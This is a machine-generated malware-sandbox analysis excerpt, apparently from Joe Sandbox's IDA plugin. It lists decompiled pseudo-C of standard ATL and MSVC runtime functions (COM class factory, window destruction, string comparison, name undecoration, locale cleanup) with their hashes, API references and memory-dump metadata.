                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in CAtlModule$_pAtlModule == 0
                      • API String ID: 2140389272-3746135848
                      • Opcode ID: 3e4d7bf74758d703576f2b93e780f037d8e869b5e322721b8e46e727f754bc8a
                      • Instruction ID: dd76631451f5470581a795c18247cda348aef9f3fe4eb1c88ebc96cbd706c2f5
                      • Opcode Fuzzy Hash: 3e4d7bf74758d703576f2b93e780f037d8e869b5e322721b8e46e727f754bc8a
                      • Instruction Fuzzy Hash: 54216274E44308BBDB00EB98DD57F6DB7B4AB90708F248494F6056B3C2D6B1AF108B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 38%
                      			E00945180(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				intOrPtr _t20;
                      				void* _t26;
                      				void* _t28;
                      				void* _t32;
                      				void* _t33;
                      				void* _t41;
                      				void* _t42;
                      				void* _t44;
                      				void* _t45;
                      
                      				_t42 = __esi;
                      				_t41 = __edi;
                      				_t33 = __ebx;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				do {
                      					_t20 = _a4;
                      					_t47 =  *((intOrPtr*)(_t20 + 0x24));
                      					if( *((intOrPtr*)(_t20 + 0x24)) == 0) {
                      						_t32 = L00994930(_t47, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xe94, 0, "%ls", L"m_pfnCreateInstance != 0");
                      						_t45 = _t45 + 0x18;
                      						if(_t32 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				_v8 = 0x80004003;
                      				if(_a16 == 0) {
                      					L10:
                      					return E009D1520(_v8, _t44 - _t45 + 0xc);
                      				}
                      				 *_a16 = 0;
                      				if(_a8 == 0) {
                      					L9:
                      					_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_a8, _a12, _a16);
                      					__eflags = _t45 - _t45;
                      					_v8 = E009D1520(_t26, __eflags);
                      					goto L10;
                      				}
                      				_t28 = E00943640(_a12, _a12);
                      				_t52 = _t28;
                      				if(_t28 != 0) {
                      					goto L9;
                      				}
                      				_push("CComClassFactory: asked for non IUnknown interface while creating an aggregated object");
                      				_push(0);
                      				_push(E0094F200(0xb337b8));
                      				_push(E009423B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xe9d));
                      				E009423E0(_t33, _t41, _t42, _t52);
                      				_t45 = _t45 + 0x10;
                      				_v8 = 0x80040110;
                      				goto L10;
                      			}
















                      APIs
                      Strings
                      • %ls, xrefs: 009451AA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 009451B6
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h, xrefs: 0094520F
                      • m_pfnCreateInstance != 0, xrefs: 009451A5
                      • CComClassFactory: asked for non IUnknown interface while creating an aggregated object, xrefs: 009451F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Smanip
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcom.h$CComClassFactory: asked for non IUnknown interface while creating an aggregated object$m_pfnCreateInstance != 0
                      • API String ID: 2140389272-1138684019
                      • Opcode ID: fe5688f4639b982ff2ee62d2a006f8cb96835d061c3990e5e958f98c7bcb16a2
                      • Instruction ID: 0b69ffe6ba2aa1f7e85d2d734826e5a311fb5177cffb1e9388224cb4f98229de
                      • Opcode Fuzzy Hash: fe5688f4639b982ff2ee62d2a006f8cb96835d061c3990e5e958f98c7bcb16a2
                      • Instruction Fuzzy Hash: B1219371E40309BBDB20EF98DD42FAE77A8AB84704F108559F9146B296D6B4DE00CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E0094DC80(intOrPtr __ecx, void* __esi) {
                      				intOrPtr _v8;
                      				void* _t11;
                      				intOrPtr _t12;
                      				void* _t16;
                      				void* _t18;
                      				void* _t19;
                      				void* _t28;
                      				void* _t29;
                      
                      				_push(__ecx);
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_t11 = E009D1520(IsWindow( *(_v8 + 4)), _t29 - _t29);
                      				_t32 = _t11;
                      				if(_t11 == 0) {
                      					_t19 = L00994930(_t32, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfdc, 0, "%ls", L"::IsWindow(this->m_hWnd)");
                      					_t29 = _t29 + 0x18;
                      					if(_t19 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t12 = _v8;
                      				_t34 =  *(_t12 + 0x20) & 0x000000ff;
                      				if(( *(_t12 + 0x20) & 0x000000ff) != 0) {
                      					_t18 = L00994930(_t34, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfde, 0, "%ls", L"!m_bModal");
                      					_t29 = _t29 + 0x18;
                      					if(_t18 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(E009D1520(DestroyWindow( *(_v8 + 4)), _t29 - _t29) != 0) {
                      					_t16 = 1;
                      				} else {
                      					_t16 = 0;
                      				}
                      				return E009D1520(_t16, _t28 - _t29 + 4);
                      			}












                      APIs
                      • IsWindow.USER32(?), ref: 0094DC98
                      • DestroyWindow.USER32(?,?,?,?,0094C6A1,5D529087,?,?,009D4F30,000000FF), ref: 0094DD09
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Destroy
                      • String ID: !m_bModal$%ls$::IsWindow(this->m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 3707531092-711770546
                      • Opcode ID: 84e454492e1df3e12a5a6f14ee85c86e2e2ae8d66db8538631054a5133e1bee0
                      • Instruction ID: 3b757b2d5ea137cf72f1013a933512232c15f4b7b9169addf31496a9c3a2c5c7
                      • Opcode Fuzzy Hash: 84e454492e1df3e12a5a6f14ee85c86e2e2ae8d66db8538631054a5133e1bee0
                      • Instruction Fuzzy Hash: A1110835F923197BCB20A7586D53F7E77588F80B08F1041A6FB09A76C2E5A4DD0047D5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00946D70(void* __esi) {
                      				intOrPtr _t21;
                      				intOrPtr _t22;
                      				void* _t25;
                      				void* _t26;
                      
                      				_t21 =  *0xb315b4; // 0x80000001
                      				if(_t21 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                      					E00957480(0xb315b4);
                      					_t26 = _t26 + 4;
                      					if( *0xb315b4 == 0xffffffff) {
                      						E00946720(0xb315b8, E009D1520(GetProcessHeap(), _t26 - _t26));
                      						E00958270(0xb315b8, 0x9d57c0);
                      						E00957430(0xb315b4);
                      						_t26 = _t26 + 8;
                      					}
                      				}
                      				_t22 =  *0xb3159c; // 0x80000002
                      				if(_t22 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                      					E00957480(0xb3159c);
                      					_t26 = _t26 + 4;
                      					_t33 =  *0xb3159c - 0xffffffff;
                      					if( *0xb3159c == 0xffffffff) {
                      						E00946D00(0xb3369c, _t33, 0xb315b8);
                      						E00958270(0xb3369c, 0x9d57a0);
                      						E00957430(0xb3159c);
                      						_t26 = _t26 + 8;
                      					}
                      				}
                      				return E009D1520(0xb3369c, _t25 - _t26);
                      			}








                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Init_thread_footerInit_thread_header_atexit$HeapProcess
                      • String ID:
                      • API String ID: 3065931843-0
                      • Opcode ID: 1049f3f03fc24fa6a624aaba1a40c323e29416768b416c0c8460197a3ec56154
                      • Instruction ID: 8c471bda15329e82fbe50973bc8e082398ba65234e2f4564981567f987c36881
                      • Opcode Fuzzy Hash: 1049f3f03fc24fa6a624aaba1a40c323e29416768b416c0c8460197a3ec56154
                      • Instruction Fuzzy Hash: C9010CF9A406009BC210F759BC43F6E729A87D671DF618761F90B173A2DE2169048BD3
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00944020(void* __esi, CHAR* _a4, CHAR* _a8) {
                      				char _v5;
                      				char _v6;
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _t39;
                      				void* _t75;
                      				void* _t76;
                      
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v5 = E009D1520(CharUpperA( *_a4 & 0x000000ff), _t76 - _t76);
                      				_v6 = E009D1520(CharUpperA( *_a8 & 0x000000ff), _t76 - _t76);
                      				while(_v5 != 0 && _v5 == _v6 && _v5 != 0x20 && _v5 != 9) {
                      					_a4 = E009D1520(CharNextA(_a4), _t76 - _t76);
                      					_a8 = E009D1520(CharNextA(_a8), _t76 - _t76);
                      					_v5 = E009D1520(CharUpperA( *_a4 & 0x000000ff), _t76 - _t76);
                      					_v6 = E009D1520(CharUpperA( *_a8 & 0x000000ff), _t76 - _t76);
                      				}
                      				__eflags = _v5;
                      				if(_v5 == 0) {
                      					L9:
                      					__eflags = _v6;
                      					if(_v6 == 0) {
                      						L12:
                      						_t39 = 0;
                      					} else {
                      						__eflags = _v6 - 0x20;
                      						if(_v6 == 0x20) {
                      							goto L12;
                      						} else {
                      							__eflags = _v6 - 9;
                      							if(_v6 != 9) {
                      								goto L13;
                      							} else {
                      								goto L12;
                      							}
                      						}
                      					}
                      				} else {
                      					__eflags = _v5 - 0x20;
                      					if(_v5 == 0x20) {
                      						goto L9;
                      					} else {
                      						__eflags = _v5 - 9;
                      						if(_v5 != 9) {
                      							L13:
                      							__eflags = _v5 - _v6;
                      							if(_v5 >= _v6) {
                      								_v12 = 1;
                      							} else {
                      								_v12 = 0xffffffff;
                      							}
                      							_t39 = _v12;
                      						} else {
                      							goto L9;
                      						}
                      					}
                      				}
                      				__eflags = _t75 - _t76 + 8;
                      				return E009D1520(_t39, _t75 - _t76 + 8);
                      			}











                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Char$Upper$Next
                      • String ID:
                      • API String ID: 3006421506-0
                      • Opcode ID: 3c8b0ec49ab84162a52101035246ffda97b7dc8411f7533bf146e468e84fbcb4
                      • Instruction ID: c35db09b505e4b88bd3bc2d8a5f70c3fd8aeb645c0246bfc601073e7ef1c8019
                      • Opcode Fuzzy Hash: 3c8b0ec49ab84162a52101035246ffda97b7dc8411f7533bf146e468e84fbcb4
                      • Instruction Fuzzy Hash: 8331C731D4D5E46ACF109BB894D27BE7F755E66312B4482C6E961A7241D63D8F80CBC0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00962860(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				signed int _v5;
                      				intOrPtr _v12;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char* _t19;
                      				intOrPtr _t20;
                      				intOrPtr* _t27;
                      				intOrPtr _t29;
                      				intOrPtr _t32;
                      				char* _t46;
                      				char* _t47;
                      				void* _t57;
                      				void* _t58;
                      
                      				_t56 = __esi;
                      				_t55 = __edi;
                      				_t38 = __ebx;
                      				_t19 =  *0xb30640; // 0x0
                      				if( *_t19 != 0) {
                      					_t20 = E00968D00(__ebx, __edi, __esi,  &_v28);
                      					_t58 = _t57 + 4;
                      					_v12 = _t20;
                      					E0095FBB0(_v12,  &_v20, 0x7b);
                      					_v5 = 0;
                      					while(1 != 0) {
                      						if((_v5 & 0x000000ff) != 0) {
                      							E0095FDE0( &_v20, 0x2c);
                      						}
                      						_t27 = E009686C0(_t38, _t55, _t56,  &_v36);
                      						_t58 = _t58 + 4;
                      						E0095FD40( &_v20, _t27);
                      						_t46 =  *0xb30640; // 0x0
                      						if( *_t46 == 0x40) {
                      							_t29 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t29 + 1;
                      							_t47 =  *0xb30640; // 0x0
                      							if( *_t47 != 0x40) {
                      								_v5 = 1;
                      								continue;
                      							}
                      							_t32 =  *0xb30640; // 0x0
                      							 *0xb30640 = _t32 + 1;
                      							break;
                      						} else {
                      							E0095F350(_a4, 2);
                      							return _a4;
                      						}
                      					}
                      					E0095FDE0( &_v20, 0x7d);
                      					E0095F240(_a4,  &_v20);
                      					return _a4;
                      				}
                      				E0095F350(_a4, 1);
                      				return _a4;
                      			}


















                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00962877
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+.LIBCMTD ref: 0096289C
                      • DName::operator+=.LIBCMTD ref: 009628BB
                      • DName::DName.LIBVCRUNTIMED ref: 009628E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Name::operator+Name::operator+=Node::makeStatus
                      • String ID:
                      • API String ID: 2485589204-0
                      • Opcode ID: f7395fa67e07a92bf8a3d09da6d4260007d77e5341b6b20bafa79a856d5501fe
                      • Instruction ID: c661e060ea4deb7daafcb3ef29f9e7e60503f274259c394dcd79526cf0138b7e
                      • Opcode Fuzzy Hash: f7395fa67e07a92bf8a3d09da6d4260007d77e5341b6b20bafa79a856d5501fe
                      • Instruction Fuzzy Hash: A121F5B0A146189BEB08EF50DCB6BBE3B74BFC0344F144068E80A5B2D1DB35AA44CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00969B40(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				char _v16;
                      				char _v24;
                      				char _v32;
                      				char _v40;
                      				char* _t18;
                      				char* _t39;
                      				intOrPtr _t42;
                      				char* _t52;
                      
                      				_t18 =  *0xb30640; // 0x0
                      				if( *_t18 != 0) {
                      					_v8 = E00968D00(__ebx, __edi, __esi,  &_v24);
                      					E0095FBB0(_v8,  &_v16, 0x7b);
                      					_t39 =  *0xb30640; // 0x0
                      					if( *_t39 != 0x40) {
                      						E0095FD40( &_v16, E0096A1E0(__ebx, __edi, __esi,  &_v32, 0, 0));
                      						E0095FDE0( &_v16, 0x3a);
                      						E0095FD40( &_v16, E009686C0(__ebx, __edi, __esi,  &_v40));
                      					}
                      					E0095FDE0( &_v16, 0x7d);
                      					_t52 =  *0xb30640; // 0x0
                      					if( *_t52 != 0x40) {
                      						E0095F350(_a4, 2);
                      						return _a4;
                      					} else {
                      						_t42 =  *0xb30640; // 0x0
                      						 *0xb30640 = _t42 + 1;
                      						E0095F240(_a4,  &_v16);
                      						return _a4;
                      					}
                      				}
                      				E0095F350(_a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00969B57
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+.LIBCMTD ref: 00969B7C
                      • DName::operator+=.LIBCMTD ref: 00969BAD
                      • DName::operator+=.LIBCMTD ref: 00969BCC
                      • Mailbox.LIBCMTD ref: 00969BF5
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::operator+=$MailboxName::Name::operator+Node::makeStatus
                      • String ID:
                      • API String ID: 3234464337-0
                      • Opcode ID: 3a4ac263ec097e84e1f7339d32cd7cefa3410b0243889bd0052e4f6a4c1b2b56
                      • Instruction ID: 62e29dde4949f7d2d07213ede6dd471787099d3642867b148c42dda7cae2dde3
                      • Opcode Fuzzy Hash: 3a4ac263ec097e84e1f7339d32cd7cefa3410b0243889bd0052e4f6a4c1b2b56
                      • Instruction Fuzzy Hash: B72151B1A40108ABDB04EF61D8A6FAE7779AF80345F104168F91A5B191DF71BE04CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E009B5490(void* __ecx, intOrPtr _a4) {
                      				signed int _v8;
                      				void* _t108;
                      				intOrPtr _t124;
                      				void* _t141;
                      				signed int _t181;
                      				void* _t199;
                      				void* _t200;
                      
                      				_t101 = _a4;
                      				if( *((intOrPtr*)(_a4 + 0x88)) == 0 ||  *((intOrPtr*)(_a4 + 0x88)) == 0xa06770 ||  *((intOrPtr*)(_a4 + 0x7c)) == 0) {
                      					L11:
                      					if( *((intOrPtr*)(_a4 + 0x8c)) != 0) {
                      						_t32 = _a4 + 0x8c; // 0x4d8bffff
                      						_t218 =  *((intOrPtr*)( *_t32));
                      						if( *((intOrPtr*)( *_t32)) == 0) {
                      							_t34 = _a4 + 0x90; // 0x84e851fc
                      							L00999480(_t218,  *_t34 - 0xfe, 2);
                      							_t36 = _a4 + 0x94; // 0x8bfffffb
                      							L00999480(_t218,  *_t36 - 0x80, 2);
                      							_t38 = _a4 + 0x98; // 0x8bc35de5
                      							L00999480( *_t38 - 0x80,  *_t38 - 0x80, 2);
                      							_t40 = _a4 + 0x8c; // 0x4d8bffff
                      							_t101 = L00999480( *_t38 - 0x80,  *_t40, 2);
                      							_t199 = _t199 + 0x20;
                      						}
                      					}
                      					_t42 = _a4 + 0x9c; // 0xec8b55ff
                      					E009B5790(_t101,  *_t42);
                      					_t200 = _t199 + 4;
                      					_v8 = 0;
                      					while(_v8 <= 5) {
                      						if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x20)) != 0xa061e8 &&  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x28)) != 0) {
                      							_t58 = (_v8 << 4) + 0x28; // 0x8bcccccc
                      							if( *((intOrPtr*)( *((intOrPtr*)(_a4 + _t58)))) == 0) {
                      								_t62 = (_v8 << 4) + 0x28; // 0x8bcccccc
                      								L00999480(_v8 << 4,  *((intOrPtr*)(_a4 + _t62)), 2);
                      								_t66 = _v8 * 4; // 0xfe45e851
                      								L00999480(_v8 << 4,  *((intOrPtr*)(_a4 + _t66 + 0xa0)), 2);
                      								_t200 = _t200 + 0x10;
                      							}
                      						}
                      						if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) == 0 ||  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)) == 0) {
                      							if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) != 0) {
                      								L25:
                      								_t108 = L00994930(_t228, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\locale\\locale_refcounting.cpp", 0xaf, 0, L"%ls", L"(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[category].locale == nullptr && ptloci->lc_category[category].refcount == nullptr)");
                      								_t200 = _t200 + 0x18;
                      								if(_t108 == 1) {
                      									asm("int3");
                      								}
                      								goto L27;
                      							}
                      							_t181 = _v8 << 4;
                      							_t124 = _a4;
                      							_t228 =  *((intOrPtr*)(_t124 + _t181 + 0x24));
                      							if( *((intOrPtr*)(_t124 + _t181 + 0x24)) == 0) {
                      								goto L27;
                      							}
                      							goto L25;
                      						} else {
                      							L27:
                      							if( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x1c)) != 0 &&  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)) != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)))) == 0) {
                      								L00999480(_v8 << 4,  *((intOrPtr*)(_a4 + (_v8 << 4) + 0x24)), 2);
                      								_t200 = _t200 + 8;
                      							}
                      							_v8 = _v8 + 1;
                      							continue;
                      						}
                      					}
                      					return L00999480(__eflags, _a4, 2);
                      				} else {
                      					_t8 = _a4 + 0x7c; // 0xeb027500
                      					if( *((intOrPtr*)( *_t8)) != 0) {
                      						goto L11;
                      					}
                      					if( *((intOrPtr*)(_a4 + 0x84)) != 0) {
                      						_t12 = _a4 + 0x84; // 0xa06074
                      						_t214 =  *((intOrPtr*)( *_t12));
                      						if( *((intOrPtr*)( *_t12)) == 0) {
                      							_t14 = _a4 + 0x84; // 0xa06074
                      							_t141 = L00999480(_t214,  *_t14, 2);
                      							_t16 = _a4 + 0x88; // 0xce1de850
                      							E009B34B0(_t141,  *_t16);
                      							_t199 = _t199 + 0xc;
                      						}
                      					}
                      					if( *((intOrPtr*)(_a4 + 0x80)) != 0) {
                      						_t20 = _a4 + 0x80; // 0xa1006a16
                      						_t216 =  *((intOrPtr*)( *_t20));
                      						if( *((intOrPtr*)( *_t20)) == 0) {
                      							_t22 = _a4 + 0x80; // 0xa1006a16
                      							L00999480(_t216,  *_t22, 2);
                      							_t24 = _a4 + 0x88; // 0xce1de850
                      							E009B3D00( *_t24,  *_t24);
                      							_t199 = _t199 + 0xc;
                      						}
                      					}
                      					_t26 = _a4 + 0x7c; // 0xeb027500
                      					L00999480(_t216,  *_t26, 2);
                      					_t28 = _a4 + 0x88; // 0xce1de850
                      					_t101 = L00999480(_t216,  *_t28, 2);
                      					_t199 = _t199 + 0x10;
                      					goto L11;
                      				}
                      			}

                      APIs
                      Strings
                      • %ls, xrefs: 009B56CD
                      • (ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 009B56C8
                      • minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 009B56D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___free_lconv_mon___free_lconv_num
                      • String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
                      • API String ID: 717313246-164516335
                      • Opcode ID: fe7688ce3f8145bc3bf6e3a782413649d0a1c3593a738df5ed01e70d1d4d9b24
                      • Instruction ID: 60c28c9c29362f454930427abc34246c0ffa538e2ff6aed65f14fdfe4aa205f5
                      • Opcode Fuzzy Hash: fe7688ce3f8145bc3bf6e3a782413649d0a1c3593a738df5ed01e70d1d4d9b24
